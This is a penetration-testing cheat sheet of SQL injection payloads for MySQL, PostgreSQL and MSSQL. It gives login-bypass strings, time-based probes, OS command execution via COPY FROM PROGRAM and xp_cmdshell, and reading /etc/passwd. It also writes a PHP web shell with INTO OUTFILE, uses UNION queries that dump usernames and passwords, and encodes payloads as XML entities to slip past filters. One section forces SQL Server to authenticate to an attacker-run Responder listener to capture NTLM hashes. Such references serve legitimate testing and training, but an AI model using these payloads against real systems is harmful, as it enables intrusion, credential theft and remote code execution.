SQLi/DB
Basics
# -- - is used instead of a bare --: MySQL only treats -- as a comment when whitespace follows it, and the trailing - stops that space from being stripped (e.g. by parameter trimming). In MySQL, # also starts a comment.
1 OR 1=1-- -
1' OR 1=1-- -
admin'-- -
Time Based
# MySQL
1' AND (select SLEEP(5))-- -
# PostgreSQL - the first form needs stacked queries; the second works inside a single SELECT
1';SELECT PG_SLEEP(5)-- -
1' AND 1=(select 1 from PG_SLEEP(5))-- -
# COPY ... FROM PROGRAM runs a shell command as the OS user the server runs as (this is RCE, not just a timing check); it needs superuser or the pg_execute_server_program role (PG 11+), plus stacked queries
1';CREATE TABLE hack(a text);copy hack from program 'sleep 10';DROP TABLE IF EXISTS hack;-- -
# MSSQL
1' WAITFOR DELAY '0:0:10'-- -
1';WAITFOR DELAY '0:0:10'-- -
# Enabling xp_cmdshell needs ALTER SETTINGS (sysadmin/serveradmin) and is noisy: it changes server configuration and leaves the option on.
# RECONFIGURE must run after 'show advanced options' before 'xp_cmdshell' can be set (Microsoft's documented sequence); without it the second sp_configure is rejected as an unknown/advanced option.
1'; EXEC sp_configure 'show advanced options', 1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell', 1 ; RECONFIGURE ; EXEC xp_cmdshell 'ping 192.0.2.1 -n 1 -w 10000' -- -
1'; EXEC sp_configure 'show advanced options', 1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell', 1 ; RECONFIGURE ; EXEC xp_cmdshell 'powershell -c "Start-Sleep -Seconds 10"' -- -
Read/Write
# MySQL - load_file() and INTO OUTFILE need the FILE privilege and are limited by secure_file_priv
# (NULL = file access disabled, '' = any path, otherwise only below that directory); OUTFILE refuses to overwrite an existing file. Check first:
SHOW VARIABLES LIKE 'secure_file_priv';
select load_file('/etc/passwd');
select '<?php echo 1;?>' into OUTFILE '/var/www/html/test.php'
# Writes a web shell that runs the value of ?0= through the system shell; the target path must be served by the web server.
# Note the -- - terminator: a bare -- with nothing after it is not a comment in MySQL.
" UNION SELECT NULL,NULL,'<?=`$_GET[0]`?>' into outfile 'C:\\xampp\\htdocs\\site1\\src\\test2.php' -- -
Union
1' Union Select 'aaa','bbb','ccc','ddd','eee' -- -
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 'abc',NULL,NULL--
' UNION SELECT username, password FROM users--
# || concatenates in PostgreSQL/Oracle/SQLite only; in MySQL it is logical OR unless PIPES_AS_CONCAT is set (use CONCAT(username,'~',password)), and MSSQL uses +
' UNION SELECT NULL,username||'~'||password FROM users--
# MySQL - group_concat() output is cut at group_concat_max_len (default 1024 chars); if the list looks truncated, page with LIMIT on a subquery instead
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
# Same, limited to the current database (drops information_schema/mysql/performance_schema/sys noise)
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables where table_schema=database()
XML Encoding
Characters can be written as XML numeric character references, in hexadecimal (&#x73;) or decimal (&#115;) form. This is useful when the injection point sits inside an XML body (SOAP, XML-RPC, etc.) that is decoded before the value reaches the query: a pattern filter inspecting the raw request sees only entities, while the database receives the original characters.
# Hex
echo -n 's' | xxd -plain | sed 's/\(..\)/\&#x\1;/g'
echo -n 's' | python3 -c 'import sys;[print(f"&#x{ord(char):x};",end="") for char in sys.stdin.read()]'
# Dec
echo -n 's' | python3 -c 'import sys;[print(f"&#{ord(char)};",end="") for char in sys.stdin.read()]'
# Example: s == &#x73; (hex) == &#115; (decimal)
Payload example
1 union select NULL
# hex-encoded form of the line above (output of the xxd/sed one-liner):
&#x31;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x4e;&#x55;&#x4c;&#x4c;
MSSQL
# Version
SELECT @@version
# Perms - sysadmin is what sp_configure/xp_cmdshell need, so check that role directly as well as the full list
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# DBs
SELECT name FROM master.sys.databases
# Tables
SELECT * FROM myamazingdb.INFORMATION_SCHEMA.TABLES
NTLM
You can try to make the SQL Server authenticate over SMB to a host you control and capture the NTLMv2 response of the account the service runs as. If that is a domain user the hash can be cracked offline; a machine or managed service account hash is not crackable and would need relaying instead. The DB host must be able to reach your listener on TCP/445 for any of this to work.
# List folders
EXEC master.sys.xp_dirtree '\',1,1;
# If it works, then you can try to trigger a connection.
# First listen with responder
sudo python3 /opt/Responder/Responder.py -I tun0 -w
# Then make MSSQL connect to the listener (the IP must be the one Responder is bound to, here the tun0 address)
EXEC master.sys.xp_dirtree '\\10.10.14.139\beepboop',1,1;
# Alternative UNC trigger if xp_dirtree is unavailable
EXEC master..xp_fileexist '\\10.10.14.139\beepboop\x';